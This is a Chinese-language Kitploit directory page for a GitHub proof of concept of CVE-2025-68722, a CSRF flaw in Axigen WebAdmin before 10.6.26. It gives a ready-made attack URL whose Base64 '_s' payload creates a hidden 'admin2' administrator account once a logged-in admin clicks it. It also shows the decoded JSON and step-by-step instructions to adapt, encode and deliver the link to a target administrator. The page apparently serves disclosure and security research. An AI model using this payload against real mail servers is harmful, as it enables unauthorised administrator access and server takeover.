Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-68722 — Axigen WebAdmin CSRF 漏洞 | Kitploit
工具/GitHubGitHub/osmancanvural/cve-2025-68722
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试论文与研究学习与教育
GitHubosmancanvural/cve-2025-68722

CVE-2025-68722

Axigen WebAdmin CSRF 漏洞

查看仓库
17个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-68722: Axigen WebAdmin CSRF

漏洞摘要

Axigen WebAdmin 界面中的关键状态更改操作可通过 GET 请求 访问。虽然 _h 令牌可以防范直接的 CSRF,但应用程序会在用户认证后立即通过 _s(面包屑)参数处理排队请求。

攻击者可以构造一个 URL,在 _s 参数中包含 Base64 编码的有效载荷。如果管理员点击此链接并完成登录过程,则排队中的操作将在其上下文中自动执行。

受影响版本: < 10.6.26

更多信息请参阅 Axigen 知识库。


POC

目标 URL: https://{axigen-domain}:9443/?_h=invalid&_s=eyJwYWdlIjoiYXVzciIsInBhcmFtcyI6eyJhY3Rpb24iOiJhZGQiLCAidXNlcm5hbWVfaW5wdXQiOiJhZG1pbjIiLCAicGFzc3dvcmRfaW5wdXQiOiJhZG1pbjIiLCAiZGlzcGxheV9uYW1lX2lucHV0IjoiYWRtaW4yIn19

解码后的有效载荷(_s 参数):

root@kitploit:~
{"page":"ausr","params":{"action":"add", "username_input":"admin2", "password_input":"admin2", "display_name_input":"admin2"}}

复现步骤:

  1. 修改: 更改 JSON 有效载荷以针对不同的管理操作(例如,修改服务器设置)。
  2. 编码: 将修改后的 JSON 重新编码为 Base64。
  3. 传递: 替换攻击 URL 中的 _s 参数值,并将其传递给目标管理员。
  4. 触发: 通过此链接登录后,将创建 admin2 账户(或执行您自定义的其他操作)。
下载工具